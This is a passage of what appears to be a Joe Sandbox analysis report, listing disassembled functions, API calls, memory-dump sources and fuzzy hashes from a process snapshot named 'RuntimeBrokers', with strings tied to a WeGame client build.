                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@D@std@@@1@@V01@V?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 288696274-0
                                        • Opcode ID: c89e290b43ea88a0ade2834648a79dacfcda31d9388b9ba00894136e7cb7334b
                                        • Instruction ID: cadbeb748ae09b508dc9b2d8eaa8786cccc2a51415839236d56ded1d4c46722a
                                        • Opcode Fuzzy Hash: c89e290b43ea88a0ade2834648a79dacfcda31d9388b9ba00894136e7cb7334b
                                        • Instruction Fuzzy Hash: AA015E34700208DFDF18DFA0D998BDC77B9AF51318F548198A55A972A1DF34AA4ACB11
                                        Function 6C15E632 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C15E63C
                                          • Part of subcall function 6C0C51EA: __EH_prolog3.LIBCMT ref: 6C0C51F1
                                          • Part of subcall function 6C0C51EA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C5215
                                          • Part of subcall function 6C0C51EA: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C522E
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,6C14E2B2,?,00000000), ref: 6C15E670
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AAI@Z.MSVCP140(?), ref: 6C15E683
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 6C15E692
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C15E6AD
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@D@std@@@1@@V01@V?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 288696274-0
                                        • Opcode ID: ebb0a3b719204e4a910ebbe1c27ed36fab4f2848946afa267a26006d90f8079e
                                        • Instruction ID: 55bc0c1e0679179dbd2c0307110fc0175fea176bf06cffff0fa2d1fc9871096b
                                        • Opcode Fuzzy Hash: ebb0a3b719204e4a910ebbe1c27ed36fab4f2848946afa267a26006d90f8079e
                                        • Instruction Fuzzy Hash: 810171347002089FDF18DFA0D998BDD77B9EF51308F108198E45A972A1DF34AE0ACB11
                                        Function 6C15E6BB Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C15E6C5
                                          • Part of subcall function 6C0C51EA: __EH_prolog3.LIBCMT ref: 6C0C51F1
                                          • Part of subcall function 6C0C51EA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C5215
                                          • Part of subcall function 6C0C51EA: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C522E
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,6C14E3A5,6C431E98,6C431E98,?,?,?,?,6C3DD48C,6C431E98), ref: 6C15E6F9
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AA_J@Z.MSVCP140(6C3DD48C,?,?,?,?,6C3DD48C,6C431E98), ref: 6C15E70C
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(?,?,?,?,6C3DD48C,6C431E98), ref: 6C15E71B
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?,?,6C3DD48C,6C431E98), ref: 6C15E736
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@D@std@@@1@@V01@V?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 288696274-0
                                        • Opcode ID: 6915347b90f7a911706ab35df105c56ed8bb2b168717fca3867b5b36921ea58e
                                        • Instruction ID: 89d0c83bc1bc8d43655a6272bacc02503649db6746c45e99c471d329f11f2cf1
                                        • Opcode Fuzzy Hash: 6915347b90f7a911706ab35df105c56ed8bb2b168717fca3867b5b36921ea58e
                                        • Instruction Fuzzy Hash: C0015E347002089FDF18DFA0D998BEC77B9EF55308F508198E55A972A1DF38AA09CA51
                                        Function 6C15E744 Relevance: 7.5, APIs: 5, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C15E74E
                                          • Part of subcall function 6C0C51EA: __EH_prolog3.LIBCMT ref: 6C0C51F1
                                          • Part of subcall function 6C0C51EA: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C5215
                                          • Part of subcall function 6C0C51EA: ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(?,00000000,00000008,6C0C7CA5,00000003,00000001,000000B0,6C0C4E75,?,?,0000003C,6C0C743F,?,-00000074,00000000), ref: 6C0C522E
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140(00000003,00000001,000000B0,6C14E3F9,?,?), ref: 6C15E782
                                        • ??5?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV01@AA_K@Z.MSVCP140(?), ref: 6C15E795
                                        • ??Bios_base@std@@QBE_NXZ.MSVCP140 ref: 6C15E7A4
                                        • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C15E7BF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$D@std@@@std@@$Bios_base@std@@H_prolog3$??0?$basic_ios@??0?$basic_iostream@??1?$basic_ios@??5?$basic_istream@D@std@@@1@@V01@V?$basic_streambuf@
                                        • String ID:
                                        • API String ID: 288696274-0
                                        • Opcode ID: 2809673ecbc3c1f1cc7b7d4de09323099080cc1e02ef7a76861ae41f2d8c6a6a
                                        • Instruction ID: 6ebc70a9bdc23b4246668c0becd44f4ec10d33f8c5ba7e5f9ffe626d3d36326e
                                        • Opcode Fuzzy Hash: 2809673ecbc3c1f1cc7b7d4de09323099080cc1e02ef7a76861ae41f2d8c6a6a
                                        • Instruction Fuzzy Hash: 9A015E347002089FDF18DFA0D998BEC77B9EF51308F108198E55A972A1DF34AA49CA51
                                        Function 004F046D Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _free.LIBCMT ref: 004F0485
                                          • Part of subcall function 004E3C2A: HeapFree.KERNEL32(00000000,00000000,?,004F080E,?,00000000,?,00000000,?,004F0B30,?,00000007,?,?,004F0EDF,?), ref: 004E3C40
                                          • Part of subcall function 004E3C2A: GetLastError.KERNEL32(?,?,004F080E,?,00000000,?,00000000,?,004F0B30,?,00000007,?,?,004F0EDF,?,?), ref: 004E3C52
                                        • _free.LIBCMT ref: 004F0497
                                        • _free.LIBCMT ref: 004F04A9
                                        • _free.LIBCMT ref: 004F04BB
                                        • _free.LIBCMT ref: 004F04CD
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: _free$ErrorFreeHeapLast
                                        • String ID:
                                        • API String ID: 776569668-0
                                        • Opcode ID: 81583f9c039e65654825a45d52d94847235553a2d3fbec2bea667c222f44b458
                                        • Instruction ID: a8acaae5e0ab86d6a33fe3a62ec54b80952852038ae723287cd9f1368941bebc
                                        • Opcode Fuzzy Hash: 81583f9c039e65654825a45d52d94847235553a2d3fbec2bea667c222f44b458
                                        • Instruction Fuzzy Hash: 5FF04F33504604AB86A0DF66F585C2BB3D9FB407127647C0AF60CF7651CE38FD844A58
                                        Function 6C0E60F5 Relevance: 7.5, APIs: 5, Instructions: 39COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C0E60FC
                                        • ?root_full_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?), ref: 6C0E610F
                                          • Part of subcall function 6C0E87E1: __EH_prolog3_GS.LIBCMT ref: 6C0E87EB
                                          • Part of subcall function 6C0E87E1: ?get_cfg_module_path@File_info@common@ierd_tgp@@SA?AVpath@filesystem@3@XZ.COMMON(?,0000008C,6C0E7514,?,000001E8,6C0E7082,?,?), ref: 6C0E8805
                                          • Part of subcall function 6C0E87E1: ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(?,?,?,?,0000008C,6C0E7514,?,000001E8,6C0E7082,?,?), ref: 6C0E8840
                                          • Part of subcall function 6C0E87E1: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,?,?,0000008C,6C0E7514,?,000001E8,6C0E7082,?,?), ref: 6C0E88A8
                                          • Part of subcall function 6C0E87E1: ??0path@filesystem@ierd_tgp@@QAE@$$QAV012@@Z.COMMON(00000000,?,?,?,00000000,?), ref: 6C0E88BA
                                        • ?parent_path@path@filesystem@ierd_tgp@@QBE?AV123@XZ.COMMON(?), ref: 6C0E6121
                                          • Part of subcall function 6C1039CE: __EH_prolog3_GS.LIBCMT ref: 6C1039D5
                                          • Part of subcall function 6C1039CE: ?parent_path_end@path@filesystem@ierd_tgp@@ABEIXZ.COMMON(00000024,6C102156,?,?), ref: 6C1039E7
                                        • ?wstring@path@filesystem@ierd_tgp@@QBE?BV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ.COMMON(?,?), ref: 6C0E6130
                                          • Part of subcall function 6C0BFACF: __EH_prolog3.LIBCMT ref: 6C0BFAD6
                                        • ??0path@filesystem@ierd_tgp@@QAE@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z.COMMON(00000000,?,?), ref: 6C0E613C
                                          • Part of subcall function 6C0BA713: __EH_prolog3.LIBCMT ref: 6C0BA71A
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_$??0path@filesystem@ierd_tgp@@File_info@common@ierd_tgp@@H_prolog3U?$char_traits@_V?$allocator@_V?$basic_string@_Vpath@12@Vpath@filesystem@3@W@std@@$?absolute@filesystem@ierd_tgp@@?exists@filesystem@ierd_tgp@@?get_cfg_module_path@?parent_path@path@filesystem@ierd_tgp@@?parent_path_end@path@filesystem@ierd_tgp@@?root_full_path@?wstring@path@filesystem@ierd_tgp@@E@$$V012@@V123@V312@0@Verror_code@std@@@W@2@@std@@W@2@@std@@@
                                        • String ID:
                                        • API String ID: 65828976-0
                                        • Opcode ID: 624ce363ec5c73e555260444018438fcad8381b8437a0030b49af394b84bbac2
                                        • Instruction ID: 5280b96eb56f10774480270289503e50ec2b4671c5f67dc7f6201d57158f2161
                                        • Opcode Fuzzy Hash: 624ce363ec5c73e555260444018438fcad8381b8437a0030b49af394b84bbac2
                                        • Instruction Fuzzy Hash: 4C014870D05288DBCF09DBE4C8587DCBBB4AB24308F54449CD141BB680DB746E0ACB61
                                        Function 6C152824 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15282E
                                        • memset.VCRUNTIME140(?,00000000,00000208,000006A0,6C0E5F49,?,6C3411A4), ref: 6C152845
                                        • memset.VCRUNTIME140(?,00000000,00000410,?,00000000,00000208,000006A0,6C0E5F49,?,6C3411A4), ref: 6C152857
                                        • SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6C15286E
                                        • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON ref: 6C1528AE
                                          • Part of subcall function 6C12E999: ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(?,6C1528B3), ref: 6C12E99D
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: memset$?get_client_id@util_client_info@ierd_tgp@@?get_client_version_type@overseas@ierd_tgp@@FolderH_prolog3_Path
                                        • String ID:
                                        • API String ID: 3134447749-0
                                        • Opcode ID: 620952106cf6ed48bad5530f8df6428e22a9681a094128cba71522b49f9e156c
                                        • Instruction ID: 7bf4c02f377fd5a1fd52533d43ca1e3f52b640d9ee2e70d7825a4878c563f81f
                                        • Opcode Fuzzy Hash: 620952106cf6ed48bad5530f8df6428e22a9681a094128cba71522b49f9e156c
                                        • Instruction Fuzzy Hash: 840119B1E1032CAFEF60DFA08C84AD9B67DBB48248F4005E9E508A7640DB759E998F55
                                        Function 6C12F9B7 Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C12F9BE
                                        • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C4396A0,?,?,?,?,00000004), ref: 6C12F9CD
                                        • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000004), ref: 6C12F9D9
                                        • GetModuleFileNameW.KERNEL32(00000000,6C4396A0,00000104,?,?,?,00000004), ref: 6C12F9E6
                                        • wcsrchr.VCRUNTIME140(6C4396A0,0000005C,?,?,?,00000004), ref: 6C12F9EF
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Module$FileH_prolog3HandleNamewcslenwcsrchr
                                        • String ID:
                                        • API String ID: 4117574448-0
                                        • Opcode ID: 4f34e5560abb3e29572bbbedde1415d9b878bd09cf188132feba233f793129a1
                                        • Instruction ID: 1fbfe30aa09f14485b912a7035f49c464d4ddafc6ddc2dc839f9c70dedf6e027
                                        • Opcode Fuzzy Hash: 4f34e5560abb3e29572bbbedde1415d9b878bd09cf188132feba233f793129a1
                                        • Instruction Fuzzy Hash: 9AF05476705611EBEB049BA0C819BDE3678AF16329F100104F1049B5C0CB7989448B99
                                        Function 6C14A92B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 178COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C14A932
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,0000002C), ref: 6C14A95D
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                          • Part of subcall function 6C0AA8F0: memmove.VCRUNTIME140(?,?,6C0B5839,?,?,00000000,?,?,6C0B5839,?,?), ref: 6C0AA917
                                          • Part of subcall function 6C0ABF20: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,000000FF,?,00000000,?,?,6C14AB23,?,6C34BBB4,?,6C3CE62F,00000000), ref: 6C0ABF3F
                                          • Part of subcall function 6C0AF830: memmove.VCRUNTIME140(?,?,00000005,?,?,00000000,?,6C0B5847,\log\,00000005,?,?), ref: 6C0AF860
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_memmove$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@4@@W@std@@__stdio_common_vsprintf
                                        • String ID: %02x$%04x
                                        • API String ID: 1991547636-287146569
                                        • Opcode ID: 567ed31b5775cbd6183d9b7f8631d384044b761df2159323b9459f010181ae74
                                        • Instruction ID: e52b516a68aae56ef954185e2e33020110d0192c7fc6074aa1540e3921b8b42d
                                        • Opcode Fuzzy Hash: 567ed31b5775cbd6183d9b7f8631d384044b761df2159323b9459f010181ae74
                                        • Instruction Fuzzy Hash: 03616270A10218AECF18DF94D8A0DECB3F5BF54304B958079E552E7991EB78D585CBD0
                                        Function 004604C5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetPrivateProfileIntW.KERNEL32(?,UsesTCLSLoginOnly,00000000,?), ref: 004606BA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: PrivateProfile
                                        • String ID: %llu$TCLSCoreConfig.ini$UsesTCLSLoginOnly
                                        • API String ID: 1469295129-3317221777
                                        • Opcode ID: c887ac2da1859ffee5a5befd5c7fbe0fc45acced01aa77e87e54e62a282dcaab
                                        • Instruction ID: df52af359690d23ea64c1475eb4addd59e335f335ce754a50403491903a85bf1
                                        • Opcode Fuzzy Hash: c887ac2da1859ffee5a5befd5c7fbe0fc45acced01aa77e87e54e62a282dcaab
                                        • Instruction Fuzzy Hash: 40913B30C0929CEEDB21DB64CD457DDBBB4AB15308F5440DAD188A7282DBB95B88DF52
                                        Function 6C10A34B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C10A355
                                          • Part of subcall function 6C10BF2B: __EH_prolog3_GS.LIBCMT ref: 6C10BF32
                                          • Part of subcall function 6C10BF2B: ?get_app_sub_path@Application@common@ierd_tgp@@SA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@V45@@Z.COMMON(?,expt,?,?,?,?,?,?,?,?,?,?,6C10C8DB), ref: 6C10BF70
                                          • Part of subcall function 6C10BF2B: ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(00000000), ref: 6C10BF80
                                          • Part of subcall function 6C10BF2B: _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000), ref: 6C10BF9F
                                          • Part of subcall function 6C10BF2B: CreateDirectoryW.KERNEL32(?,00000000), ref: 6C10BFB7
                                          • Part of subcall function 6C10BF2B: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6C10BFC1
                                          • Part of subcall function 6C10BF2B: GetLastError.KERNEL32(00000000,00000001,d:\ci_dev\wegame_client\codes\common\src\info_trace_helper.cpp,000000C6,6C3CE62F), ref: 6C10BFFE
                                          • Part of subcall function 6C10BAA6: __EH_prolog3_GS.LIBCMT ref: 6C10BAB0
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,00000140,6C10A5BC,?,?,?,000000A8,6C10A8E7,?,?,?), ref: 6C10A422
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                          • Part of subcall function 6C10E315: __EH_prolog3_GS.LIBCMT ref: 6C10E31C
                                        • _waccess.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(?,00000000,00000000,?,?,?,?,%s\%s), ref: 6C10A4CC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
